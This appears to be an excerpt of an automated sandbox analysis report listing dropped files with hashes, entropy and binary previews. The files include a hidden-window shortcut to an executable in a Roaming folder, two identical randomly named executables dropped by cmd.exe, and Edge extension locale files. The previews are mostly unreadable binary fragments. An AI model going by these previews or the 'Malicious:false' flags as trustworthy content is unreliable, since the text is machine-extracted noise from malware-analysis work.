                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\bxigrg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jan 6 21:16:37 2025, mtime=Mon Jan 6 21:16:38 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):926
                                                                                                                                                                  Entropy (8bit):5.005440842644019
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:84ZlfCw4qd90WCNndY//I4kLG2KaOOLQwD/mtYjAK2rHky5uUkRUJ6bwD/cpvBmV:84OYtyn+NGua1i8AK2sRUUocpvBm
                                                                                                                                                                  MD5:737F8ED9FF325184383F6B36089D0C0C
                                                                                                                                                                  SHA1:631FAB03334B1EF674F849C87CF403DB144D3AD5
                                                                                                                                                                  SHA-256:90795BCCB67904AFA03B67DE1065DEE6C4481A0986442EB1B225A308082A78D6
                                                                                                                                                                  SHA-512:EDBCC6E526087D2245F22ACCD1335569EDCF28807EF0E03FEE3B8E972222337D121D86FD76EDBD3186F108EE4E65FE73D0B1081D9BCFA70266A07B5A647D492E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:L..................F.... .....h..`.......`....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......`..o.4..`......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^&Z.............................%..A.p.p.D.a.t.a...B.V.1.....&Z....Roaming.@......CW.^&Z.............................VW.R.o.a.m.i.n.g.....^.1.....&Z....TASKMA~1..F......&Z..&Z......R......................L0.T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......&Z..&Z................................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......k...............-.......j...........J........C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......210979...........hT..CrF.f4... ...T..b...,.......hT..CrF.f4... ...T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\c4832b96-9f60-43ae-9bf2-9dc65f3aad6d.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41902
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):76319
                                                                                                                                                                  Entropy (8bit):7.996132588300074
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6w6DLZ8:GdS8scZNzFrMa4M+lK5/nEDd8
                                                                                                                                                                  MD5:24439F0E82F6A60E541FB2697F02043F
                                                                                                                                                                  SHA1:E3FAA84B0ED8CDD2268D53A0ECC6F3134D5EBD8F
                                                                                                                                                                  SHA-256:B24DD5C374F8BB381A48605D183B6590245EE802C65F643632A3BE9BB1F313C5
                                                                                                                                                                  SHA-512:8FD794657A9F80FDBC2350DC26A2C82DFD82266B934A4472B3319FDB870841C832137D4F5CE41D518859B8B1DA63031C6B7E750D301F87D6ECA45B958B147FCD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):353
                                                                                                                                                                  Entropy (8bit):5.372304412078899
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:YEW3Lr9YTL56s/uW6MTDTpgQTQJjDrwv/uW6MqGapJ56s/C:YTbrgL56s/NBnTpgS0Dkv/NBWJ56s/C
                                                                                                                                                                  MD5:73E2697E6B18A897934E5590865F435D
                                                                                                                                                                  SHA1:7CEB2FBCE3AED436D71AD954701A73ED7BE45A89
                                                                                                                                                                  SHA-256:08648E98F4AB79DAB7EAA2330CD1E260897ABF6547CD5130CB2D3DB9E7047B19
                                                                                                                                                                  SHA-512:FE5C58949822074C258439D288D543479534DFA633C7806BD68095CBF7DE82D81A3C88FF07E129ED73AB6EB1D3E343A0B432E02A148F088AEA6B7E3EFFE1971F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"logTime": "0106/221806", "correlationVector":"PFqPU4T49qyXiuMJLKLnYj","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "0106/221808", "correlationVector":"3B532141AB13436FAC36659AE69EA59B","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "0106/221808", "correlationVector":"21iO4+2HPbyCUiNtnZD/Kp","action":"EXTENSION_UPDATER", "result":""}.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\eykunyxpxybnsa

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2602496
                                                                                                                                                                  Entropy (8bit):6.716476069650749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                                  MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                                  SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                                  SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                                  SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\f2cae771-045b-4fc0-8f83-495d8af6319a.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\fc8bf7e7-09ce-4ea0-892d-1079b9d9a354.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\hsiywoxwiypiaj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2602496
                                                                                                                                                                  Entropy (8bit):6.716476069650749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                                  MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                                  SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                                  SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                                  SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\128.png

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

